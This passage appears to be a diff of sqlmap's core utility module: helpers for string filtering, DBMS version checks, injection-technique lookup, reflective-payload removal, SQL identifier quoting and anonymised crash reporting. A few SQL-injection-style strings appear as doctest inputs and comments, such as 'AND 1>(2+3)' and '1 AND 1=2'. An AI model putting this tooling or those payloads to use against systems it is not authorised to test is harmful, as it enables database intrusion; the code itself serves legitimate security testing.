only of chars satisfying supplied + regular expression (note: it has to be in form [...]) + + >>> filterStringValue('wzydeadbeef0123#', r'[0-9a-f]') + 'deadbeef0123' + """ + + retVal = value + + if value: + retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value) + + return retVal + +def filterControlChars(value, replacement=' '): + """ + Returns string value with control chars being supstituted with replacement character + + >>> filterControlChars('AND 1>(2+3)\\n--') + 'AND 1>(2+3) --' + """ + + return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement) + +def filterNone(values): + """ + Emulates filterNone([...]) functionality + + >>> filterNone([1, 2, "", None, 3]) + [1, 2, 3] + """ + + retVal = values + + if isinstance(values, _collections.Iterable): + retVal = [_ for _ in values if _] + + return retVal + +def isDBMSVersionAtLeast(minimum): + """ + Checks if the recognized DBMS version is at least the version specified + + >>> pushValue(kb.dbmsVersion) + >>> kb.dbmsVersion = "2" + >>> isDBMSVersionAtLeast("1.3.4.1.4") + True + >>> isDBMSVersionAtLeast(2.1) + False + >>> isDBMSVersionAtLeast(">2") + False + >>> isDBMSVersionAtLeast(">=2.0") + True + >>> kb.dbmsVersion = "<2" + >>> isDBMSVersionAtLeast("2") + False + >>> isDBMSVersionAtLeast("1.5") + True + >>> kb.dbmsVersion = "MySQL 5.4.3-log4" + >>> isDBMSVersionAtLeast("5") + True + >>> kb.dbmsVersion = popValue() + """ + + retVal = None + + if not any(isNoneValue(_) for _ in (Backend.getVersion(), minimum)) and Backend.getVersion() != UNKNOWN_DBMS_VERSION: + version = Backend.getVersion().replace(" ", "").rstrip('.') + + correction = 0.0 + if ">=" in version: + pass + elif '>' in version: + correction = VERSION_COMPARISON_CORRECTION + elif '<' in version: + correction = -VERSION_COMPARISON_CORRECTION + + version = extractRegexResult(r"(?P[0-9][0-9.]*)", version) + + if version: + if '.' in version: + parts = version.split('.', 1) + parts[1] = filterStringValue(parts[1], '[0-9]') + version = '.'.join(parts) + + try: + version = float(filterStringValue(version, '[0-9.]')) + correction + except ValueError: + return None + + if isinstance(minimum, six.string_types): + if '.' in minimum: + parts = minimum.split('.', 1) + parts[1] = filterStringValue(parts[1], '[0-9]') + minimum = '.'.join(parts) + + correction = 0.0 + if minimum.startswith(">="): + pass + elif minimum.startswith(">"): + correction = VERSION_COMPARISON_CORRECTION + + minimum = float(filterStringValue(minimum, '[0-9.]')) + correction + + retVal = version >= minimum + + return retVal + +def parseSqliteTableSchema(value): + """ + Parses table column names and types from specified SQLite table schema + + >>> kb.data.cachedColumns = {} + >>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);") + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER')) + True + """ + + retVal = False + + value = extractRegexResult(r"(?s)\((?P.+)\)", value) + + if value: + table = {} + columns = OrderedDict() + + value = re.sub(r"\(.+?\)", "", value).strip() + + for match in re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + column = match.group(1).strip(match.group(2) or "") + if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()): + continue + retVal = True + + columns[column] = match.group(3) or "TEXT" + + table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns + kb.data.cachedColumns[conf.db] = table + + return retVal + +def getTechniqueData(technique=None): + """ + Returns injection data for technique specified + """ + + return kb.injection.data.get(technique if technique is not None else getTechnique()) + +def isTechniqueAvailable(technique): + """ + Returns True if there is injection data which sqlmap could use for technique specified + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.ERROR] = [test for test in getSortedInjectionTests() if "error" in test["title"].lower()][0] + >>> isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) + True + >>> kb.injection.data = popValue() + """ + + if conf.technique and isinstance(conf.technique, list) and technique not in conf.technique: + return False + else: + return getTechniqueData(technique) is not None + +def isHeavyQueryBased(technique=None): + """ + Returns True whether current (kb.)technique is heavy-query based + + >>> pushValue(kb.injection.data) + >>> setTechnique(PAYLOAD.TECHNIQUE.STACKED) + >>> kb.injection.data[getTechnique()] = [test for test in getSortedInjectionTests() if "heavy" in test["title"].lower()][0] + >>> isHeavyQueryBased() + True + >>> kb.injection.data = popValue() + """ + + retVal = False + + technique = technique or getTechnique() + + if isTechniqueAvailable(technique): + data = getTechniqueData(technique) + if data and "heavy query" in data["title"].lower(): + retVal = True + + return retVal + +def isStackingAvailable(): + """ + Returns True whether techniques using stacking are available + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.STACKED] = [test for test in getSortedInjectionTests() if "stacked" in test["title"].lower()][0] + >>> isStackingAvailable() + True + >>> kb.injection.data = popValue() + """ + + retVal = False + + if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: + retVal = True + else: + for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): + data = getTechniqueData(technique) + if data and "stacked" in data["title"].lower(): + retVal = True + break + + return retVal + +def isInferenceAvailable(): + """ + Returns True whether techniques using inference technique are available + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.BOOLEAN] = getSortedInjectionTests()[0] + >>> isInferenceAvailable() + True + >>> kb.injection.data = popValue() + """ + + return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME)) + +def setOptimize(): + """ + Sets options turned on by switch '-o' + """ + + # conf.predictOutput = True + conf.keepAlive = True + conf.threads = 3 if conf.threads < 3 and cmdLineOptions.threads is None else conf.threads + conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) + + if not conf.nullConnection: + debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'" + logger.debug(debugMsg) + +def saveConfig(conf, filename): + """ + Saves conf to configuration filename + """ + + config = UnicodeRawConfigParser() + userOpts = {} + + for family in optDict: + userOpts[family] = [] + + for option, value in conf.items(): + for family, optionData in optDict.items(): + if option in optionData: + userOpts[family].append((option, value, optionData[option])) + + for family, optionData in userOpts.items(): + config.add_section(family) + + optionData.sort() + + for option, value, datatype in optionData: + if datatype and isListLike(datatype): + datatype = datatype[0] + + if option in IGNORE_SAVE_OPTIONS: + continue + + if value is None: + if datatype == OPTION_TYPE.BOOLEAN: + value = "False" + elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): + if option in defaults: + value = str(defaults[option]) + else: + value = '0' + elif datatype == OPTION_TYPE.STRING: + value = "" + + if isinstance(value, six.string_types): + value = value.replace("\n", "\n ") + + config.set(family, option, value) + + with openFile(filename, "wb") as f: + try: + config.write(f) + except IOError as ex: + errMsg = "something went wrong while trying " + errMsg += "to write to the configuration file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + +def initTechnique(technique=None): + """ + Prepares data for technique specified + """ + + try: + data = getTechniqueData(technique) + resetCounter(technique) + + if data: + kb.pageTemplate, kb.errorIsNone = getPageTemplate(data.templatePayload, kb.injection.place) + kb.matchRatio = data.matchRatio + kb.negativeLogic = (technique == PAYLOAD.TECHNIQUE.BOOLEAN) and (data.where == PAYLOAD.WHERE.NEGATIVE) + + # Restoring stored conf options + for key, value in kb.injection.conf.items(): + if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))): + setattr(conf, key, value) + debugMsg = "resuming configuration option '%s' (%s)" % (key, ("'%s'" % value) if isinstance(value, six.string_types) else value) + logger.debug(debugMsg) + + if value and key == "optimize": + setOptimize() + else: + warnMsg = "there is no injection data available for technique " + warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) + logger.warning(warnMsg) + + except SqlmapDataException: + errMsg = "missing data in old session file(s). " + errMsg += "Please use '--flush-session' to deal " + errMsg += "with this error" + raise SqlmapNoneDataException(errMsg) + +def arrayizeValue(value): + """ + Makes a list out of value if it is not already a list or tuple itself + + >>> arrayizeValue('1') + ['1'] + """ + + if isinstance(value, _collections.KeysView): + value = [_ for _ in value] + elif not isListLike(value): + value = [value] + + return value + +def unArrayizeValue(value): + """ + Makes a value out of iterable if it is a list or tuple itself + + >>> unArrayizeValue(['1']) + '1' + >>> unArrayizeValue('1') + '1' + >>> unArrayizeValue(['1', '2']) + '1' + >>> unArrayizeValue([['a', 'b'], 'c']) + 'a' + >>> unArrayizeValue(_ for _ in xrange(10)) + 0 + """ + + if isListLike(value): + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + value = [_ for _ in flattenValue(value) if _ is not None] + value = value[0] if len(value) > 0 else None + elif inspect.isgenerator(value): + value = unArrayizeValue([_ for _ in value]) + + return value + +def flattenValue(value): + """ + Returns an iterator representing flat representation of a given value + + >>> [_ for _ in flattenValue([['1'], [['2'], '3']])] + ['1', '2', '3'] + """ + + for i in iter(value): + if isListLike(i): + for j in flattenValue(i): + yield j + else: + yield i + +def joinValue(value, delimiter=','): + """ + Returns a value consisting of joined parts of a given value + + >>> joinValue(['1', '2']) + '1,2' + >>> joinValue('1') + '1' + """ + + if isListLike(value): + retVal = delimiter.join(value) + else: + retVal = value + + return retVal + +def isListLike(value): + """ + Returns True if the given value is a list-like instance + + >>> isListLike([1, 2, 3]) + True + >>> isListLike('2') + False + """ + + return isinstance(value, (list, tuple, set, OrderedSet, BigArray)) + +def getSortedInjectionTests(): + """ + Returns prioritized test list by eventually detected DBMS from error messages + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.SQLITE + >>> [test for test in getSortedInjectionTests() if hasattr(test, "details") and hasattr(test.details, "dbms")][0].details.dbms == kb.forcedDbms + True + >>> kb.forcedDbms = popValue() + """ + + retVal = copy.deepcopy(conf.tests) + + def priorityFunction(test): + retVal = SORT_ORDER.FIRST + + if test.stype == PAYLOAD.TECHNIQUE.UNION: + retVal = SORT_ORDER.LAST + + elif "details" in test and "dbms" in (test.details or {}): + if intersect(test.details.dbms, Backend.getIdentifiedDbms()): + retVal = SORT_ORDER.SECOND + else: + retVal = SORT_ORDER.THIRD + + return retVal + + if Backend.getIdentifiedDbms(): + retVal = sorted(retVal, key=priorityFunction) + + return retVal + +def filterListValue(value, regex): + """ + Returns list with items that have parts satisfying given regular expression + + >>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)') + ['users', 'admins'] + """ + + if isinstance(value, list) and regex: + retVal = [_ for _ in value if re.search(regex, _, re.I)] + else: + retVal = value + + return retVal + +def showHttpErrorCodes(): + """ + Shows all HTTP error codes raised till now + """ + + if kb.httpErrorCodes: + warnMsg = "HTTP error codes detected during run:\n" + warnMsg += ", ".join("%d (%s) - %d times" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items()) + logger.warning(warnMsg) + if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes): + msg = "too many 4xx and/or 5xx HTTP error codes " + msg += "could mean that some kind of protection is involved (e.g. WAF)" + logger.debug(msg) + +def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="reversible", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) + """ + Returns file handle of a given filename + + >>> "openFile" in openFile(__file__).read() + True + >>> b"openFile" in openFile(__file__, "rb", None).read() + True + """ + + # Reference: https://stackoverflow.com/a/37462452 + if 'b' in mode: + buffering = 0 + + if filename == STDIN_PIPE_DASH: + if filename not in kb.cache.content: + kb.cache.content[filename] = sys.stdin.read() + + return contextlib.closing(io.StringIO(readCachedFileContent(filename))) + else: + try: + return codecs.open(filename, mode, encoding, errors, buffering) + except IOError: + errMsg = "there has been a file opening error for filename '%s'. " % filename + errMsg += "Please check %s permissions on a file " % ("write" if mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") + errMsg += "and that it's not locked by another process" + raise SqlmapSystemException(errMsg) + +def decodeIntToUnicode(value): + """ + Decodes inferenced integer value to an unicode character + + >>> decodeIntToUnicode(35) == '#' + True + >>> decodeIntToUnicode(64) == '@' + True + """ + retVal = value + + if isinstance(value, int): + try: + if value > 255: + _ = "%x" % value + + if len(_) % 2 == 1: + _ = "0%s" % _ + + raw = decodeHex(_) + + if Backend.isDbms(DBMS.MYSQL): + # Reference: https://dev.mysql.com/doc/refman/8.0/en/string-functions.html#function_ord + # Note: https://github.com/sqlmapproject/sqlmap/issues/1531 + retVal = getUnicode(raw, conf.encoding or UNICODE_ENCODING) + elif Backend.isDbms(DBMS.MSSQL): + # Reference: https://docs.microsoft.com/en-us/sql/relational-databases/collations/collation-and-unicode-support?view=sql-server-2017 and https://stackoverflow.com/a/14488478 + retVal = getUnicode(raw, "UTF-16-BE") + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE): # Note: cases with Unicode code points (e.g. http://www.postgresqltutorial.com/postgresql-ascii/) + retVal = _unichr(value) + else: + retVal = getUnicode(raw, conf.encoding) + else: + retVal = _unichr(value) + except: + retVal = INFERENCE_UNKNOWN_CHAR + + return retVal + +def getDaysFromLastUpdate(): + """ + Get total number of days from last update + + >>> getDaysFromLastUpdate() >= 0 + True + """ + + if not paths: + return + + return int(time.time() - os.path.getmtime(paths.SQLMAP_SETTINGS_PATH)) // (3600 * 24) + +def unhandledExceptionMessage(): + """ + Returns detailed message about occurred unhandled exception + + >>> all(_ in unhandledExceptionMessage() for _ in ("unhandled exception occurred", "Operating system", "Command line")) + True + """ + + errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING + errMsg += "run with the latest development version from official GitHub " + errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE + errMsg += "at '%s' " % ISSUES_PAGE + errMsg += "with the following text and any other information required to " + errMsg += "reproduce the bug. Developers will try to reproduce the bug, fix it accordingly " + errMsg += "and get back to you\n" + errMsg += "Running version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] + errMsg += "Python version: %s\n" % PYVERSION + errMsg += "Operating system: %s\n" % platform.platform() + errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=getattr(sys.stdin, "encoding", None))) + errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, getTechnique()) if getTechnique() is not None else ("DIRECT" if conf.get("direct") else None)) + errMsg += "Back-end DBMS:" + + if Backend.getDbms() is not None: + errMsg += " %s (fingerprinted)" % Backend.getDbms() + + if Backend.getIdentifiedDbms() is not None and (Backend.getDbms() is None or Backend.getIdentifiedDbms() != Backend.getDbms()): + errMsg += " %s (identified)" % Backend.getIdentifiedDbms() + + if not errMsg.endswith(')'): + errMsg += " None" + + return errMsg + +def getLatestRevision(): + """ + Retrieves latest revision from the offical repository + """ + + retVal = None + req = _urllib.request.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py", headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = getUnicode(_urllib.request.urlopen(req).read()) + retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P[\d.]+)", content) + except: + pass + + return retVal + +def fetchRandomAgent(): + """ + Returns random HTTP User-Agent header value + + >>> '(' in fetchRandomAgent() + True + """ + + if not kb.userAgents: + debugMsg = "loading random HTTP User-Agent header(s) from " + debugMsg += "file '%s'" % paths.USER_AGENTS + logger.debug(debugMsg) + + try: + kb.userAgents = getFileItems(paths.USER_AGENTS) + except IOError: + errMsg = "unable to read HTTP User-Agent header " + errMsg += "file '%s'" % paths.USER_AGENTS + raise SqlmapSystemException(errMsg) + + return random.sample(kb.userAgents, 1)[0] + +def createGithubIssue(errMsg, excMsg): + """ + Automatically create a Github issue with unhandled exception information + """ + + try: + issues = getFileItems(paths.GITHUB_HISTORY, unique=True) + except: + issues = [] + finally: + issues = set(issues) + + _ = re.sub(r"'[^']+'", "''", excMsg) + _ = re.sub(r"\s+line \d+", "", _) + _ = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", _) + _ = re.sub(r".+\Z", "", _) + _ = re.sub(r"(Unicode[^:]*Error:).+", r"\g<1>", _) + _ = re.sub(r"= _", "= ", _) + + key = hashlib.md5(getBytes(_)).hexdigest()[:8] + + if key in issues: + return + + msg = "\ndo you want to automatically create a new (anonymized) issue " + msg += "with the unhandled exception information at " + msg += "the official Github repository? [y/N] " + try: + choice = readInput(msg, default='N', checkBatch=False, boolean=True) + except: + choice = None + + if choice: + _excMsg = None + errMsg = errMsg[errMsg.find("\n"):] + + req = _urllib.request.Request(url="https://api.github.com/search/issues?q=%s" % _urllib.parse.quote("repo:sqlmapproject/sqlmap Unhandled exception (#%s)" % key), headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = _urllib.request.urlopen(req).read() + _ = json.loads(content) + duplicate = _["total_count"] > 0 + closed = duplicate and _["items"][0]["state"] == "closed" + if duplicate: + warnMsg = "issue seems to be already reported" + if closed: + warnMsg += " and resolved. Please update to the latest " + warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE + logger.warning(warnMsg) + return + except: + pass + + data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} + req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % decodeBase64(GITHUB_REPORT_OAUTH_TOKEN, binary=False), HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = getText(_urllib.request.urlopen(req).read()) + except Exception as ex: + content = None + _excMsg = getSafeExString(ex) + + issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "") + if issueUrl: + infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0) + logger.info(infoMsg) + + try: + with openFile(paths.GITHUB_HISTORY, "a+b") as f: + f.write("%s\n" % key) + except: + pass + else: + warnMsg = "something went wrong while creating a Github issue" + if _excMsg: + warnMsg += " ('%s')" % _excMsg + if "Unauthorized" in warnMsg: + warnMsg += ". Please update to the latest revision" + logger.warning(warnMsg) + +def maskSensitiveData(msg): + """ + Masks sensitive data in the supplied message + + >>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner' + True + >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line' + True + """ + + retVal = getUnicode(msg) + + for item in filterNone(conf.get(_) for _ in SENSITIVE_OPTIONS): + if isListLike(item): + item = listToStrValue(item) + + regex = SENSITIVE_DATA_REGEX % re.sub(r"(\W)", r"\\\1", getUnicode(item)) + while extractRegexResult(regex, retVal): + value = extractRegexResult(regex, retVal) + retVal = retVal.replace(value, '*' * len(value)) + + # Just in case (for problematic parameters regarding user encoding) + for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal): + retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + + # Fail-safe substitutions + retVal = re.sub(r"(?i)(Command line:.+)\b(https?://[^ ]+)", lambda match: "%s%s" % (match.group(1), '*' * len(match.group(2))), retVal) + retVal = re.sub(r"(?i)(\b\w:[\\/]+Users[\\/]+|[\\/]+home[\\/]+)([^\\/]+)", lambda match: "%s%s" % (match.group(1), '*' * len(match.group(2))), retVal) + + if getpass.getuser(): + retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) + + return retVal + +def listToStrValue(value): + """ + Flattens list to a string value + + >>> listToStrValue([1,2,3]) + '1, 2, 3' + """ + + if isinstance(value, (set, tuple, types.GeneratorType)): + value = list(value) + + if isinstance(value, list): + retVal = value.__str__().lstrip('[').rstrip(']') + else: + retVal = value + + return retVal + +def intersect(containerA, containerB, lowerCase=False): + """ + Returns intersection of the container-ized values + + >>> intersect([1, 2, 3], set([1,3])) + [1, 3] + """ + + retVal = [] + + if containerA and containerB: + containerA = arrayizeValue(containerA) + containerB = arrayizeValue(containerB) + + if lowerCase: + containerA = [val.lower() if hasattr(val, "lower") else val for val in containerA] + containerB = [val.lower() if hasattr(val, "lower") else val for val in containerB] + + retVal = [val for val in containerA if val in containerB] + + return retVal + +def decodeStringEscape(value): + """ + Decodes escaped string values (e.g. "\\t" -> "\t") + """ + + retVal = value + + if value and '\\' in value: + charset = "\\%s" % string.whitespace.replace(" ", "") + for _ in charset: + retVal = retVal.replace(repr(_).strip("'"), _) + + return retVal + +def encodeStringEscape(value): + """ + Encodes escaped string values (e.g. "\t" -> "\\t") + """ + + retVal = value + + if value: + charset = "\\%s" % string.whitespace.replace(" ", "") + for _ in charset: + retVal = retVal.replace(_, repr(_).strip("'")) + + return retVal + +def removeReflectiveValues(content, payload, suppressWarning=False): + """ + Neutralizes reflective values in a given content based on a payload + (e.g. ..search.php?q=1 AND 1=2 --> "...searching for 1%20AND%201%3D2..." --> "...searching for __REFLECTED_VALUE__...") + """ + + retVal = content + + try: + if all((content, payload)) and isinstance(content, six.text_type) and kb.reflectiveMechanism and not kb.heuristicMode: + def _(value): + while 2 * REFLECTED_REPLACEMENT_REGEX in value: + value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) + return value + + payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ""), convall=True)) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", encodeStringEscape(REFLECTED_REPLACEMENT_REGEX))) + + if regex != payload: + if all(part.lower() in content.lower() for part in filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check + parts = regex.split(REFLECTED_REPLACEMENT_REGEX) + + # Note: naive approach + retVal = content.replace(payload, REFLECTED_VALUE_MARKER) + retVal = retVal.replace(re.sub(r"\A\w+", "", payload), REFLECTED_VALUE_MARKER) + + if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs + regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS // 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS // 2:]))) + + parts = filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX)) + + if regex.startswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) + else: + regex = r"\b%s" % regex + + if regex.endswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) + else: + regex = r"%s\b" % regex + + _retVal = [retVal] + + def _thread(regex): + try: + _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + + if len(parts) > 2: + regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) + _retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + except KeyboardInterrupt: + raise + except: + pass + + thread = threading.Thread(target=_thread, args=(regex,)) + thread.daemon = True + thread.start() + thread.join(REFLECTED_REPLACEMENT_TIMEOUT) + + if thread.is_alive(): + kb.reflectiveMechanism = False + retVal = content + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (because of timeouts)" + logger.debug(debugMsg) + else: + retVal = _retVal[0] + + if retVal != content: + kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 + if not suppressWarning: + warnMsg = "reflective value(s) found and filtering out" + singleTimeWarnMessage(warnMsg) + + if re.search(r"(?i)FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal): + warnMsg = "frames detected containing attacked parameter values. Please be sure to " + warnMsg += "test those separately in case that attack on this page fails" + singleTimeWarnMessage(warnMsg) + + elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: + kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 + if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (for optimization purposes)" + logger.debug(debugMsg) + + except (MemoryError, SystemError): + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism" + logger.debug(debugMsg) + + return retVal + +def normalizeUnicode(value, charset=string.printable[:string.printable.find(' ') + 1]): + """ + Does an ASCII normalization of unicode strings + + # Reference: http://www.peterbe.com/plog/unicode-to-ascii + + >>> normalizeUnicode(u'\\u0161u\\u0107uraj') == u'sucuraj' + True + >>> normalizeUnicode(getUnicode(decodeHex("666f6f00626172"))) == u'foobar' + True + """ + + retVal = value + + if isinstance(value, six.text_type): + retVal = unicodedata.normalize("NFKD", value) + retVal = "".join(_ for _ in retVal if _ in charset) + + return retVal + +def safeSQLIdentificatorNaming(name, isTable=False): + """ + Returns a safe representation of SQL identificator name (internal data format) + + # Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.MSSQL + >>> getText(safeSQLIdentificatorNaming("begin")) + '[begin]' + >>> getText(safeSQLIdentificatorNaming("foobar")) + 'foobar' + >>> kb.forceDbms = popValue() + """ + + retVal = name + + if conf.unsafeNaming: + return retVal + + if isinstance(name, six.string_types): + retVal = getUnicode(name) + _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) + + if _: + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "%s." % DEFAULT_MSSQL_SCHEMA, retVal) + + # Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf) + if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) + if not conf.noEscape: + retVal = unsafeSQLIdentificatorNaming(retVal) + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users) + retVal = "`%s`" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO): + retVal = "\"%s\"" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL): + retVal = "\"%s\"" % retVal.upper() + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + if isTable: + parts = retVal.split('.', 1) + for i in xrange(len(parts)): + if parts[i] and (re.search(r"\A\d|[^\w]", parts[i], re.U) or parts[i].upper() in kb.keywords): + parts[i] = "[%s]" % parts[i] + retVal = '.'.join(parts) + else: + if re.search(r"\A\d|[^\w]", retVal, re.U) or retVal.upper() in kb.keywords: + retVal = "[%s]" % retVal + + if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): + if (conf.db or "").lower() != 